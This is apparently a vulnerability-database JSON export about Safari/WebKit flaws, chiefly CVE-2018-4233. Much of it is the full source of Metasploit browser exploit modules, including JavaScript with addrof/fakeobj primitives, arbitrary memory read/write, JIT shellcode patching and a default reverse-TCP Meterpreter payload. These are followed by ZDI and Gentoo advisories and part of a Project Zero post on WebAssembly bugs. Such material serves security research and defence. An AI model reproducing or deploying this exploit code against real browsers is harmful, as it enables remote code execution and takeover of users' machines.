{\n if (req.responseType != \"arraybuffer\") throw \"y u no blob\";\n payload.set(new Uint8Array(req.response), 0x0);\n pwn();\n } catch (e) {\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\n }\n });\n req.addEventListener(\"error\", function(ev) {\n fail(ev)\n });\n req.send()\n } catch (e) {\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\n }\n};\n\ngo();\n\n</script>\n</body>\n</html>\n ^\n unless datastore['DEBUG_EXPLOIT']\n html.gsub!(/\\/\\/.*$/, '') # strip comments\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/apple_ios/browser/webkit_createthis.rb"}, {"lastseen": "2021-01-16T00:33:30", "description": "This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The JIT region is then replaced with shellcode which loads the second stage. The second stage exploits a logic error in libxpc, which uses command execution via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Safari Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4233", "CVE-2018-4404"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/OSX/BROWSER/SAFARI_PROXY_OBJECT_TYPE_CONFUSION/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari Proxy Object Type Confusion',\n 'Description' => %q{\n This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The JIT region is then replaced with shellcode which loads the second stage.\n The second stage exploits a logic error in libxpc, which uses command execution\n via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'saelo' ],\n 'References' => [\n ['CVE', '2018-4233'],\n ['CVE', '2018-4404'],\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\n ['URL', 'https://github.com/saelo/pwn2own2018'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ],\n 'Arch' => [ ARCH_PYTHON, ARCH_CMD ],\n 'Platform' => 'osx',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },\n 'Targets' => [\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],\n ],\n 'DisclosureDate' => '2018-03-15'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\n ])\n end\n\n def offset_table\n {\n '10.12.6' => {\n :jsc_vtab => '0x0000d8d8',\n :dyld_stub_loader => '0x00001168',\n :dlopen => '0x000027f7',\n :confstr => '0x00002c84',\n :strlen => '0x00001b40',\n :strlen_got => '0xdc0',\n },\n '10.13' => {\n :jsc_vtab => '0x0000e5f8',\n :dyld_stub_loader => '0x000012a8',\n :dlopen => '0x00002e60',\n :confstr => '0x000024fc',\n :strlen => '0x00001440',\n :strlen_got => '0xee8',\n },\n '10.13.3' => {\n :jsc_vtab => '0xe5e8',\n :dyld_stub_loader => '0x1278',\n :dlopen => '0x2e30',\n :confstr => '0x24dc',\n :strlen => '0x1420',\n :strlen_got => '0xee0',\n },\n }\n end\n\n def stage1_js\n stage1 = exploit_data \"CVE-2018-4233\", \"stage1.bin\"\n \"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);\"\n end\n\n def stage2_js\n stage2 = exploit_data \"CVE-2018-4404\", \"stage2.dylib\"\n payload_cmd = payload.raw\n if target['Arch'] == ARCH_PYTHON\n payload_cmd = \"echo \\\"#{payload_cmd}\\\" | python\"\n end\n placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')\n stage2[placeholder_index, payload_cmd.length] = payload_cmd\n \"var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);\"\n end\n\n def get_offsets(user_agent)\n if user_agent =~ /Intel Mac OS X (.*?)\\)/\n osx_version = $1.gsub(\"_\", \".\")\n if user_agent =~ /Version\\/(.*?) /\n if Gem::Version.new($1) >= Gem::Version.new('11.1.1')\n print_warning \"Safari version #{$1} is not vulnerable\"\n return false\n else\n print_good \"Safari version #{$1} appears to be vulnerable\"\n end\n end\n mac_osx_version = Gem::Version.new(osx_version)\n if mac_osx_version >= Gem::Version.new('10.13.4')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif mac_osx_version < Gem::Version.new('10.12')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif offset_table.key?(osx_version)\n offset = offset_table[osx_version]\n return <<-EOF\nconst JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};\nconst DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};\nconst DLOPEN_OFFSET = #{offset[:dlopen]};\nconst CONFSTR_OFFSET = #{offset[:confstr]};\nconst STRLEN_OFFSET = #{offset[:strlen]};\nconst STRLEN_GOT_OFFSET = #{offset[:strlen_got]};\nEOF\n else\n print_warning \"No offsets for version #{mac_osx_version}\"\n end\n else\n print_warning \"Unexpected User-Agent\"\n end\n return false\n end\n\n def on_request_uri(cli, request)\n user_agent = request['User-Agent']\n print_status(\"Request from #{user_agent}\")\n offsets = get_offsets(user_agent)\n unless offsets\n send_not_found(cli)\n return\n end\n\n utils = exploit_data \"javascript_utils\", \"utils.js\"\n int64 = exploit_data \"javascript_utils\", \"int64.js\"\n html = %Q^\n<html>\n<body>\n<script>\n#{stage1_js}\nstage1.replace = function(oldVal, newVal) {\n for (var idx = 0; idx < this.length; idx++) {\n var found = true;\n for (var j = idx; j < idx + 8; j++) {\n if (this[j] != oldVal.byteAt(j - idx)) {\n found = false;\n break;\n }\n }\n if (found)\n break;\n }\n this.set(newVal.bytes(), idx);\n};\n#{stage2_js}\n#{utils}\n#{int64}\n#{offsets}\n\nvar ready = new Promise(function(resolve) {\n if (typeof(window) === 'undefined')\n resolve();\n else\n window.onload = function() {\n resolve();\n }\n});\n\nready = Promise.all([ready]);\n\nprint = function(msg) {\n //console.log(msg);\n //document.body.innerText += msg + '\\\\n';\n}\n\n// Must create this indexing type transition first,\n// otherwise the JIT will deoptimize later.\nvar a = [13.37, 13.37];\na[0] = {};\n\nvar referenceFloat64Array = new Float64Array(0x1000);\n\n//\n// Bug: the DFG JIT does not take into account that, through the use of a\n// Proxy, it is possible to run arbitrary JS code during the execution of a\n// CreateThis operation. This makes it possible to change the structure of e.g.\n// an argument without causing a bailout, leading to a type confusion.\n//\n\n//\n// addrof primitive\n//\nfunction setupAddrof() {\n function InfoLeaker(a) {\n this.address = a[0];\n }\n\n var trigger = false;\n var leakme = null;\n var arg = null;\n\n var handler = {\n get(target, propname) {\n if (trigger)\n arg[0] = leakme;\n return target[propname];\n },\n };\n var InfoLeakerProxy = new Proxy(InfoLeaker, handler);\n\n for (var i = 0; i < 100000; i++) {\n new InfoLeakerProxy([1.1, 2.2, 3.3]);\n }\n\n trigger = true;\n\n return function(obj) {\n leakme = obj;\n arg = [1.1, 1.1];\n var o = new InfoLeakerProxy(arg);\n return o.address;\n };\n}\n\n//\n// fakeobj primitive\n//\nfunction setupFakeobj() {\n function ObjFaker(a, address) {\n a[0] = address;\n }\n\n var trigger = false;\n var arg = null;\n\n var handler = {\n get(target, propname) {\n if (trigger)\n arg[0] = {};\n return target[propname];\n },\n };\n var ObjFakerProxy = new Proxy(ObjFaker, handler);\n\n for (var i = 0; i < 100000; i++) {\n new ObjFakerProxy([1.1, 2.2, 3.3], 13.37);\n }\n\n trigger = true;\n\n return function(address) {\n arg = [1.1, 1.1];\n var o = new ObjFakerProxy(arg, address);\n return arg[0];\n };\n}\n\nfunction makeJITCompiledFunction() {\n // Some code to avoid inlining...\n function target(num) {\n for (var i = 2; i < num; i++) {\n if (num % i === 0) {\n return false;\n }\n }\n return true;\n }\n\n // Force JIT compilation.\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n return target;\n}\n\nfunction pwn() {\n // Spray Float64Array structures so that structure ID 0x1000 will\n // be a Float64Array with very high probability\n var structs = [];\n for (var i = 0; i < 0x1000; i++) {\n var a = new Float64Array(1);\n a['prop' + i] = 1337;\n structs.push(a);\n }\n\n // Setup exploit primitives\n var addrofOnce = setupAddrof();\n var fakeobjOnce = setupFakeobj();\n\n // (Optional) Spray stuff to keep the background GC busy and increase reliability even further\n /*\n var stuff = [];\n for (var i = 0; i < 0x100000; i++) {\n stuff.push({foo: i});\n }\n */\n\n var float64MemView = new Float64Array(0x200);\n var uint8MemView = new Uint8Array(0x1000);\n\n // Setup container to host the fake Float64Array\n var jsCellHeader = new Int64([\n 00, 0x10, 00, 00, // m_structureID\n 0x0, // m_indexingType\n 0x2b, // m_type\n 0x08, // m_flags\n 0x1 // m_cellState\n ]);\n\n var container = {\n jsCellHeader: jsCellHeader.asJSValue(),\n butterfly: null,\n vector: float64MemView,\n length: (new Int64('0x0001000000001337')).asJSValue(),\n mode: {}, // an empty object, we'll need that later\n };\n\n // Leak address and inject fake object\n // RawAddr == address in float64 form\n var containerRawAddr = addrofOnce(container);\n var fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16);\n print(\"[+] Fake Float64Array @ \" + fakeArrayAddr);\n\n ///\n /// BEGIN CRITICAL SECTION\n ///\n /// Objects are corrupted, a GC would now crash the process.\n /// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations.\n ///\n var driver = fakeobjOnce(fakeArrayAddr.asDouble());\n while (!(driver instanceof Float64Array)) {\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\n container.jsCellHeader = jsCellHeader.asJSValue();\n }\n\n // Get some addresses that we'll need to repair our objects. We'll abuse the .mode\n // property of the container to leak addresses.\n driver[2] = containerRawAddr;\n var emptyObjectRawAddr = float64MemView[6];\n container.mode = referenceFloat64Array;\n var referenceFloat64ArrayRawAddr = float64MemView[6];\n\n // Fixup the JSCell header of the container to make it look like an empty object.\n // By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array.\n driver[2] = emptyObjectRawAddr;\n var header = float64MemView[0];\n driver[2] = containerRawAddr;\n float64MemView[0] = header;\n\n // Copy the JSCell header from an existing Float64Array and set the butterfly to zero.\n // Also set the mode: make it look like an OversizeTypedArray for easy GC survival\n // (see JSGenericTypedArrayView<Adaptor>::visitChildren).\n driver[2] = referenceFloat64ArrayRawAddr;\n var header = float64MemView[0];\n var length = float64MemView[3];\n var mode = float64MemView[4];\n driver[2] = containerRawAddr;\n float64MemView[2] = header;\n float64MemView[3] = 0;\n float64MemView[5] = length;\n float64MemView[6] = mode;\n\n // Root the container object so it isn't garbage collected.\n // This will allocate a butterfly for the fake object and store a reference to the container there.\n // The fake array itself is rooted by the memory object (closures).\n driver.container = container;\n\n ///\n /// END CRITICAL SECTION\n ///\n /// Objects are repaired, we will now survive a GC\n ///\n if (typeof(gc) !== 'undefined')\n gc();\n\n memory = {\n read: function(addr, length) {\n driver[2] = memory.addrof(uint8MemView).asDouble();\n float64MemView[2] = addr.asDouble();\n var a = new Array(length);\n for (var i = 0; i < length; i++)\n a[i] = uint8MemView[i];\n return a;\n },\n\n write: function(addr, data) {\n driver[2] = memory.addrof(uint8MemView).asDouble();\n float64MemView[2] = addr.asDouble();\n for (var i = 0; i < data.length; i++)\n uint8MemView[i] = data[i];\n },\n\n read8: function(addr) {\n driver[2] = addr.asDouble();\n return Int64.fromDouble(float64MemView[0]);\n },\n\n write8: function(addr, value) {\n driver[2] = addr.asDouble();\n float64MemView[0] = value.asDouble();\n },\n\n addrof: function(obj) {\n float64MemView.leakme = obj;\n var butterfly = Int64.fromDouble(driver[1]);\n return memory.read8(Sub(butterfly, 0x10));\n },\n };\n\n print(\"[+] Got stable memory read/write!\");\n\n // Find binary base\n var funcAddr = memory.addrof(Math.sin);\n var executableAddr = memory.read8(Add(funcAddr, 24));\n var codeAddr = memory.read8(Add(executableAddr, 24));\n var vtabAddr = memory.read8(codeAddr);\n var jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET);\n print(\"[*] JavaScriptCore.dylib @ \" + jscBaseUnaligned);\n var jscBase = And(jscBaseUnaligned, new Int64(\"0x7ffffffff000\"));\n print(\"[*] JavaScriptCore.dylib @ \" + jscBase);\n\n var dyldStubLoaderAddr = memory.read8(jscBase);\n var dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET);\n var strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET));\n var libCBase = Sub(strlenAddr, STRLEN_OFFSET);\n print(\"[*] dyld.dylib @ \" + dyldBase);\n print(\"[*] libsystem_c.dylib @ \" + libCBase);\n\n var confstrAddr = Add(libCBase, CONFSTR_OFFSET);\n print(\"[*] confstr @ \" + confstrAddr);\n var dlopenAddr = Add(dyldBase, DLOPEN_OFFSET);\n print(\"[*] dlopen @ \" + dlopenAddr);\n\n // Patching shellcode\n var stage2Addr = memory.addrof(stage2);\n stage2Addr = memory.read8(Add(stage2Addr, 16));\n print(\"[*] Stage 2 payload @ \" + stage2Addr);\n\n stage1.replace(new Int64(\"0x4141414141414141\"), confstrAddr);\n stage1.replace(new Int64(\"0x4242424242424242\"), stage2Addr);\n stage1.replace(new Int64(\"0x4343434343434343\"), new Int64(stage2.length));\n stage1.replace(new Int64(\"0x4444444444444444\"), dlopenAddr);\n print(\"[+] Shellcode patched\");\n\n // Leak JITCode pointer poison value\n var poison_addr = Add(jscBase, 305152);\n print(\"[*] Poison value @ \" + poison_addr);\n var poison = memory.read8(poison_addr);\n print(\"[*] Poison value: \" + poison);\n\n // Shellcode\n var func = makeJITCompiledFunction();\n var funcAddr = memory.addrof(func);\n print(\"[+] Shellcode function object @ \" + funcAddr);\n var executableAddr = memory.read8(Add(funcAddr, 24));\n print(\"[+] Executable instance @ \" + executableAddr);\n var jitCodeAddr = memory.read8(Add(executableAddr, 24));\n print(\"[+] JITCode instance @ \" + jitCodeAddr);\n\n var codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32));\n var codeAddr = Xor(codeAddrPoisoned, poison);\n print(\"[+] RWX memory @ \" + codeAddr.toString());\n print(\"[+] Writing shellcode...\");\n var origCode = memory.read(codeAddr, stage1.length);\n memory.write(codeAddr, stage1);\n\n print(\"[!] Jumping into shellcode...\");\n var res = func();\n if (res === 0) {\n print(\"[+] Shellcode executed sucessfully!\");\n } else {\n print(\"[-] Shellcode failed to execute: error \" + res);\n }\n\n memory.write(codeAddr, origCode);\n print(\"[*] Restored previous JIT code\");\n\n print(\"[+] We are done here, continuing WebContent process as if nothing happened =)\");\n if (typeof(gc) !== 'undefined')\n gc();\n}\n\nready.then(function() {\n try {\n pwn();\n } catch (e) {\n print(\"[-] Exception caught: \" + e);\n }\n}).catch(function(err) {\n print(\"[-] Initializatin failed\");\n});\n\n</script>\n</body>\n</html>\n ^\n unless datastore['DEBUG_EXPLOIT']\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '')\n end\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\n\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb"}], "zdi": [{"lastseen": "2020-06-22T11:42:20", "bulletinFamily": "info", "cvelist": ["CVE-2018-4199"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of SVG elements. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code under the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-07-26T00:00:00", "id": "ZDI-18-781", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-781/", "title": "(Pwn2Own) Apple Safari SVG Heap-based Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-22T11:40:08", "bulletinFamily": "info", "cvelist": ["CVE-2018-4233"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of JIT. By performing actions in JavaScript, an attacker can trigger a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-10-30T00:00:00", "id": "ZDI-18-1321", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-1321/", "title": "(Pwn2Own) Apple Safari CreateThis Type Confusion Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2018-08-23T00:25:34", "bulletinFamily": "unix", "cvelist": ["CVE-2018-4119", "CVE-2018-4129", "CVE-2018-4165", "CVE-2018-4146", "CVE-2018-4270", "CVE-2018-12294", "CVE-2018-4101", "CVE-2018-4128", "CVE-2018-4199", "CVE-2018-4163", "CVE-2018-4120", "CVE-2018-4266", "CVE-2018-4272", "CVE-2018-4118", "CVE-2018-4114", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4264", "CVE-2018-4261", "CVE-2018-11713", "CVE-2018-11712", "CVE-2018-4133", "CVE-2018-4162", "CVE-2018-12293", "CVE-2018-4125", "CVE-2018-4267", "CVE-2018-4233", "CVE-2018-4273", "CVE-2018-4113", "CVE-2018-4222", "CVE-2018-4127", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4278", "CVE-2018-4218", "CVE-2018-4263", "CVE-2018-4214", "CVE-2018-4284", "CVE-2018-4117", "CVE-2018-4232", "CVE-2018-4122", "CVE-2018-4265", "CVE-2018-4200", "CVE-2018-4121", "CVE-2018-4262"], "description": "### Background\n\nWebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers. \n\n### Description\n\nMultiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details. \n\n### Impact\n\nA remote attacker could execute arbitrary commands or cause a denial of service condition via a maliciously crafted web content. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll WebkitGTK+ users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/webkit-gtk-2.20.4\"", "edition": 1, "modified": "2018-08-22T00:00:00", "published": "2018-08-22T00:00:00", "id": "GLSA-201808-04", "href": "https://security.gentoo.org/glsa/201808-04", "title": "WebkitGTK+: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:21:46", "bulletinFamily": "info", "cvelist": ["CVE-2018-4121", "CVE-2018-4222", "CVE-2018-5093", "CVE-2018-6092"], "description": "Posted by Natalie Silvanovich, Project Zero \n \nWebAssembly is a format that allows code written in assembly-like instructions to be run from JavaScript. It has recently been implemented in all four major browsers. We reviewed each browser\u2019s WebAssembly implementation and found three vulnerabilities. This blog post gives an overview of the features and attack surface of WebAssembly, as well as the vulnerabilities we found.\n\n### Building WebAssembly\n\n** \n**\n\nA number of tools can be used to write WebAssembly code. An important [goal](<http://webassembly.org/docs/high-level-goals/>) of the designers of the format is to be able to compile C and C++ into WebAssembly, and compilers exist to do so. It is likely that other languages will compile into WebAssembly in the future. It is also possible to write WebAssembly in [WebAssembly text format](<https://webassembly.github.io/spec/core/text/index.html>) which is a direct text representation of [WebAssembly binary format](<https://webassembly.github.io/spec/core/binary/index.html>), the final format of all WebAssembly code.\n\n### WebAssembly Modules\n\n** \n**\n\nCode in WebAssembly binary format starts off in an ArrayBuffer or TypedArray in JavaScript. It is then loaded into a WebAssembly Module.\n\n** \n**\n\nvar code = new ArrayBuffer(len);\n\n\u2026 // write code into ArrayBuffer\n\nvar m = new WebAssembly.Module(code); \n\n** \n**\n\nA module is an object that contains the code and initialization information specified by the bytes in binary format. When a module is created, it parses the binary, loads needed information into the module, and then translates the WebAssembly instructions into an intermediate bytecode. Verification of the WebAssembly instructions is performed during this translation.\n\n** \n**\n\nWebAssembly binaries consist of a series of sections (binary blobs) with different lengths and types. The sections supported by WebAssembly binary format are as follows.\n\n** \n**\n\nSection\n\n| \n\nCode\n\n| \n\nDescription \n \n---|---|--- \n \nType\n\n| \n\n1\n\n| \n\nContains a list of function signatures used by functions defined and called by the module. Each signature has an index, and can be used by multiple functions by specifying that index. \n \nImports\n\n| \n\n2\n\n| \n\nContains the names and types of objects to be imported. More on this later. \n \nFunctions\n\n| \n\n3\n\n| \n\nThe declarations (including the index of a signature specified in the Type Section) of the functions defined in this module. \n \nTable\n\n| \n\n4\n\n| \n\nContains details about function tables. More on this later. \n \nMemory\n\n| \n\n5\n\n| \n\nContains details about memory. More on this later. \n \nGlobal\n\n| \n\n6\n\n| \n\nGlobal declarations. \n \nExports\n\n| \n\n7\n\n| \n\nContains the names and types of objects and functions that will be exported. \n \nStart\n\n| \n\n8\n\n| \n\nSpecifies a function that will be called on Module start-up. \n \nElements\n\n| \n\n9\n\n| \n\nTable initialization information. \n \nCode\n\n| \n\n10\n\n| \n\nThe WebAssembly instructions that make up the body of each function. \n \nData\n\n| \n\n11\n\n| \n\nMemory initialization information. \n \n** \n**\n\nIf a section has a code that is not specified in the above table, it is called a custom section. Some browsers use custom sections to implement upcoming or experimental features. Unrecognized custom sections are skipped when loading a Module, and can be accessed as TypedArrays in JavaScript.\n\n** \n**\n\nModule loading starts off by parsing the module. This involves going through each section, verifying its format and then loading the needed information into a native structure inside the WebAssembly engine. Most of the bugs that Project Zero found in WebAssembly occured in this phase.\n\n** \n**\n\nTo start, [CVE-2018-4222](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1545>) occurs when the WebAssembly binary is read out of the buffer containing it. TypedArray objects in JavaScript can contain offsets at which their underlying ArrayBuffers are accessed. The WebKit implementation of this added the offset to the ArrayBuffer data pointer twice. So the following code:\n\n** \n**\n\nvar b2 = new ArrayBuffer(1000); \nvar view = new Int8Array(b2, 700); // offset \nvar mod = new WebAssembly.Module(view);\n\n** \n**\n\nWill read memory out-of-bounds in an unfixed version of WebKit. Note that this is also a functional error, as it prevents any TypedArray with an offset from being processed correctly by WebAssembly.\n\n** \n**\n\n[CVE-2018-6092](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1546>) in Chrome is an example of an issue that occurs when parsing a WebAssembly buffer. [Similar](<https://bugs.chromium.org/p/chromium/issues/detail?id=737069>) [issues](<https://bugs.chromium.org/p/chromium/issues/detail?id=647329>) [have](<https://bugs.chromium.org/p/chromium/issues/detail?id=789952>) been fixed in the past. In this vulnerability, there is an integer overflow when parsing the locals of a function specified in the code section of the binary. The number of locals of each type are added together, and the size_t that contains this number can wrap on a 32-bit platform.\n\n** \n**\n\nIt is also evident from the section table above (and specified in the WebAssembly standard) that sections must be unique and in the correct order. For example, the function section can\u2019t load unless the type section containing the signatures it needs has been loaded already. \n\n[CVE-2018-4121](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1546>) is an error in section order checking in WebKit. In unfixed versions of WebKit, the order check gets reset after a custom section is processed, basically allowing sections to occur any number of times in any order. This leads to an overflow in several vectors in WebKit, as its parsing implementation allocates memory based on the assumption that there is only one of each section, and then adds elements to the memory without checking. Even without this implementation detail, though, this bug would likely lead to many subtle memory corruption issues in the WebAssembly engine, as the order and non-duplicate nature of WebAssembly binary sections is very fundamental to the functionality of WebAssembly.\n\n** \n**\n\nThis vulnerability was independently discovered by Alex Plaskett, Fabian Beterke and Georgi Geshev of MWR Labs, and they describe their exploit [here](<https://labs.mwrinfosecurity.com/assets/BlogFiles/apple-safari-wasm-section-vuln-write-up-2018-04-16.pdf>).\n\n### WebAssembly Instances\n\n** \n**\n\nAfter a binary is loaded into a Module, an Instance of the module needs to be created to run the code. An Instance binds the code to imported objects it needs to run, and does some final initialization.\n\n** \n**\n\nvar code = new ArrayBuffer(len);\n\n\u2026 // write code into ArrayBuffer\n\nvar m = new WebAssembly.Module(code);\n\nvar i = new WebAssembly.Instance(m, imports);\n\n** \n**\n\nEach module has an Import Section it loaded from the WebAssembly binary. This section contains the names and types of objects that must be imported from JavaScript for the code in the module to run. There are four types of object that can be imported. Functions (JavaScript or WebAssembly) can be imported and called from WebAssembly. Numeric types can also be imported from JavaScript to populate globals.\n\n** \n**\n\nMemory and Table objects are the final two types that can be imported. These are new object types added to JavaScript engines for use in WebAssembly. Memory objects contain the memory used by the WebAssembly code. This memory can be accessed in JavaScript via an ArrayBuffer, and in WebAssembly via load and store instructions. When creating a Memory object, the WebAssembly developer specifies the initial and optional maximum size of the memory. The Memory object is then created with the initial memory size allocated, and the allocated memory size can be increased in JavaScript by calling the grow method, and in WebAssembly using the grow instruction. Memory size can never decrease (at least according to the standard).\n\n** \n**\n\nTable objects are function tables for WebAssembly. They contain function objects at specific indexes in the table, and these functions can be called from WebAssembly using the call_indirect instruction. Like memory, tables have an initial and optional maximum size, and their size can be expanded by calling the grow method in JavaScript. Table objects cannot be expanded in WebAssembly. Table objects can only contain WebAssembly functions, not JavaScript functions, and an exception is thrown if the wrong type of function is added to a Table object. Currently, WebAssembly only supports one Memory object and one Table object per Instance object. This is likely to change in the future though. \n\n** \n**\n\nMore than one Instance object can share the same Memory object and Table object. If two or more Instance objects share both of these objects, they are referred to as being in the same compartment. It is possible to create Instance objects that share a Table object, but not a Memory object, or vice versa, but no compiler should ever create Instances with this property. No compiler ever changes the values in a table after it is initialized, and this is likely to remain true in the future, but it is still possible for JavaScript callers to change them at any time.\n\n** \n**\n\nThere are two ways to add Memory and Table objects to an Instance object. The first is through the Import Section as mentioned above. The second way is to include a Memory or Table Section in the binary. Including these sections causes the WebAssembly engine to create the needed Memory or Table object for the module, with parameters provided in the binary. It is not valid to specify these objects in both the Import Section and the Table or Memory Section, as this would mean there is more than one of each object, which is not currently allowed. Memory and Table objects are not mandatory, and it is fairly common for code in WebAssembly not to have a Table object. It is also possible to create WebAssembly code that does not have a Memory object, for example a function that averages the parameters that are passed in, but this is rare in practice.\n\n** \n**\n\nOne feature of these objects that has led to several vulnerabilities is the ability to increase the size of the allocated Memory or Table object. For example, [CVE-2018-5093](<https://www.mozilla.org/en-US/security/advisories/mfsa2018-02/#>), a series of integer overflow vulnerabilities in increasing the size of Memory and Table objects was recently found by [OSS-Fuzz](<https://opensource.google.com/projects/oss-fuzz>). A similar [issue](<https://bugs.chromium.org/p/chromium/issues/detail?id=772056>) was found in Chrome by OSS-Fuzz.\n\n** \n**\n\nAnother question that immediately comes to mind about Memory objects is whether the internal ArrayBuffer can be detached, as many vulnerabilities have occured in ArrayBuffer detachment. According to the specification, Memory object ArrayBuffers cannot be detached by script, and this is true in all browsers except for Microsoft Edge (Chakra does not allow this, but Edge does). The Memory object ArrayBuffer also do not change size when the Memory object is expanded. Instead, they are detached as soon as the grow method is called. This prevents any bugs that could occur due to ArrayBuffers changing size. \n\n** \n**\n\nOut of bounds access is always a concern when allowing script to use memory, but these types of issues are fairly uncommon in WebAssembly. One likely reason for this is that a limited number of WebAssembly instructions can access memory, and WebAssembly currently only supports a single page of memory, so the code that accesses memory is a WebAssembly engine is actually quite small. Also, on 64-bit systems, WebAssembly implements memory as safe buffers (also called signal buffers). To understand how safe buffers work, it is important to understand how loads and stores work in WebAssembly. These instructions have two operands, an address and an offset. When memory is accessed, these two operands are added to the pointer to the start of the internal memory of the Memory object, and the resulting location is where the memory access happens. Since both of these operands are 32-bit integers (note that this is likely to change in future versions of WebAssembly), and required to be above zero, a memory access can be at most 0xfffffffe (4GB) outside of the allocated buffer.\n\n** \n**\n\nSafe buffers work by mapping 4GB into memory space, and then allocating the portion of memory that is actually needed by WebAssembly code as RW memory at the start of the mapped address space. Memory accesses can be at most 4GB from the start of the memory buffer, so all accesses should be in this range. Then, if memory is accessed outside of the allocated memory, it will cause a signal (or equivalent OS error), which is then handled by the WebAssembly engine, and an appropriate out of bounds exception is then thrown in JavaScript. Safe buffers eliminate the need for bounds checks in code, making vulnerabilities due to out-of-bounds access less likely on 64-bit systems. Explicit bounds checking is still required on 32-bit systems, but these are becoming less common.\n\n** 